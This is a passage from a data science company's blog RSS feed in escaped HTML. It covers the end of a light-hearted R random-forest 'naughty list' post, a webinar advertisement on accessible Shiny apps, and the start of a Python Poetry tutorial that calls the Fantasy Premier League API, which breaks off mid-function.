&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; team,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ate_too_many_cookies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; forgot_to_send_cards &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sang_off_key &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; wrapping_disaster &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; naughty &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Encode names as numeric&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next on the list is to set up a vector of features we want to use, and
then train the model. We can then use the model to predict our
fictitious naughtiness score for each team member! We can see Theo is at
the top of the list, closely followed by Osheen.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;features &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;name_encoded&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ate_too_many_cookies&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;forgot_to_send_cards&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sang_off_key&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;wrapping_disaster&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Train Random Forest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rf_model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;randomForest&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[, features],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.factor&lt;/span&gt;(df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;naughty),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ntree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Predict naughtiness&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;predicted_naughty &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict&lt;/span&gt;(rf_model, df[, features])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;naughtiness_score &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict&lt;/span&gt;(rf_model, df[, features],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;prob&amp;#34;&lt;/span&gt;)[, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create the Naughty List&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;naughty_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(naughtiness_score)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(name, naughtiness_score, predicted_naughty)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(naughty_list)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## # A tibble: 23 × 3
## name naughtiness_score predicted_naughty
## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;fct&amp;gt;
## 1 Theo Roe 0.76 1
## 2 Osheen MacOscar 0.74 1
## 3 Myles Mitchell 0.72 1
## 4 Esther Gillespie 0.68 1
## 5 Deborah Washington 0.66 1
## 6 Tim Brock 0.59 1
## 7 Amieroh Abrahams 0.55 1
## 8 Santa's Intern Elf 0.48 0
## 9 Carolyn Wilson 0.38 0
## 10 Susan Smith 0.2 0
## # ℹ 13 more rows
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The last thing to do is visualise our results with
&lt;a href="https://ggplot2.tidyverse.org/" rel="external"&gt;{ggplot2}&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Fun bar plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(naughty_list,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(name, naughtiness_score),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; naughtiness_score,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.factor&lt;/span&gt;(predicted_naughty))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;forestgreen&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;1&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;darkred&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Nice&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Naughty&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;🎅 Jumping Rivers ML-powered Naughty List 🎄&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Team Member&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Naughtiness Score&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Status&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers Naughty List&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;(base_family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;outfit&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/featured.png" alt="Ggplot2 column chart showing Jumping Rivers Naughty List" width="672" /&gt;
&lt;h2 id="step-4-analysis-and-notes"&gt;Step 4: Analysis and Notes&lt;/h2&gt;
&lt;p&gt;After generating predictions, we can interpret the Naughty List. The
highest naughtiness scores indicate which participants are most
mischievous according to our playful model.&lt;/p&gt;
&lt;p&gt;Observations from this analysis include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cookie Enthusiasts: Participants with multiple cookie infractions
scored higher.&lt;/li&gt;
&lt;li&gt;Gift Wrapping Chaos: Those whose presents looked like abstract art
contributed to higher scores.&lt;/li&gt;
&lt;li&gt;Musical Mishaps: Off-key carolers were highlighted as naughty.&lt;/li&gt;
&lt;li&gt;Forgotten Cards: Small lapses in festive correspondence nudged some up
the naughty rankings.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Special mentions:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Theo unsurprisingly tops the naughty list.&lt;/li&gt;
&lt;li&gt;Santa’s Intern Elf performed well, staying mostly nice.&lt;/li&gt;
&lt;li&gt;Shane had the best score and I’m sure Santa will be very nice to him
this year!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This analysis provides both a technical demonstration of ML workflow and
a fun story that engages readers during the festive season.&lt;/p&gt;
&lt;h2 id="step-5-conclusion"&gt;Step 5: Conclusion&lt;/h2&gt;
&lt;p&gt;This project demonstrates how machine learning can be used in creative
ways outside of traditional business use cases. By combining features
with a proper ML workflow, we created a light-hearted, festive story
suitable for a blog, while also reinforcing good practices in data
collection, preprocessing, modeling, and visualization.&lt;/p&gt;
&lt;p&gt;Ultimately, the Jumping Rivers ML-Powered Naughty List is a celebration
of data science, team culture, and holiday fun. Whether you’re naughty
or nice, we hope this inspires creative applications of ML in festive
contexts.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Make Your Shiny Apps Accessible to Everyone – Free Jumping Rivers Webinar!</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/</link><pubDate>Mon, 08 Dec 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Date &amp;amp; Time (BST): 11 December 2025, 13:00
Topic: Accessible Shiny: Designing for All Users&lt;/p&gt;
&lt;p&gt;Are you ready to make your Shiny applications more inclusive, user-friendly, and professional?
Join Jumping Rivers for our free monthly webinar series, designed for data professionals at all levels.
In just &lt;strong&gt;55 minutes&lt;/strong&gt;, you’ll learn how to create Shiny apps that are &lt;strong&gt;accessible to all users&lt;/strong&gt;,
meet modern accessibility standards, and provide a seamless experience for everyone – all from the comfort of your own desk.&lt;/p&gt;
&lt;h3 id="why-attend"&gt;Why Attend?&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Learn practical accessibility techniques&lt;/strong&gt; to make your Shiny apps usable for everyone.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhance your professional skills&lt;/strong&gt; and make your dashboards more inclusive and impactful.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Connect with a network&lt;/strong&gt; of data scientists, analysts, and developers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Learn flexibly online&lt;/strong&gt; with no cost.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="unlock-exclusive-benefits"&gt;Unlock Exclusive Benefits&lt;/h3&gt;
&lt;p&gt;Attend &lt;strong&gt;2 webinars&lt;/strong&gt; → 20% off tickets to the AI in Production conference.
Attend &lt;strong&gt;more than 2 webinars&lt;/strong&gt; → 20% off any of our high-quality public training courses.&lt;/p&gt;
&lt;p&gt;Whether you’re looking to improve your Shiny skills or make your data applications accessible to all users,
this webinar is your chance to &lt;strong&gt;level up your expertise and stand out in 2026&lt;/strong&gt;.&lt;/p&gt;
&lt;h3 id="ready-to-join"&gt;Ready to Join?&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;Register now to secure your spot and start creating Shiny apps everyone can use!&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Creating a Python Package with Poetry for Beginners Part 3</title><link>https://www.jumpingrivers.com/blog/python-package-part-three/</link><pubDate>Thu, 04 Dec 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-package-part-three/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-package-part-three/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-package-part-three/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="intro"&gt;Intro&lt;/h2&gt;
&lt;p&gt;This is the third part of a blog series. In the previous posts we have addressed: creating a package with Poetry, managing our development environment and
adding a function in &lt;a href="https://www.jumpingrivers.com/blog/python-package/" rel="external"&gt;part one&lt;/a&gt;;
and package documentation, testing and how to publish to PyPI in
&lt;a href="https://www.jumpingrivers.com/blog/python-package-part-two" rel="external"&gt;part two&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In those previous posts, I
developed a function for summarising the successes (and failures) of the teams in a fantasy football league. That function makes various API calls which in theory could all be made in parallel to speed up
the runtime.&lt;/p&gt;
&lt;p&gt;In this blog I aim to parallelise the function &lt;code&gt;get_season_league&lt;/code&gt; which I wrote in the
first blog.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-package-part-3"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="starting-function"&gt;Starting Function&lt;/h2&gt;
&lt;p&gt;Here is the function written in part one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fantasy.premierleague.com/api/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;leagues-classic/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/standings/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; league &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;standings&amp;#39;&lt;/span&gt;][&lt;span style="color:#a5d6ff"&gt;&amp;#39;results&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame([])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; index, row &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; league&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
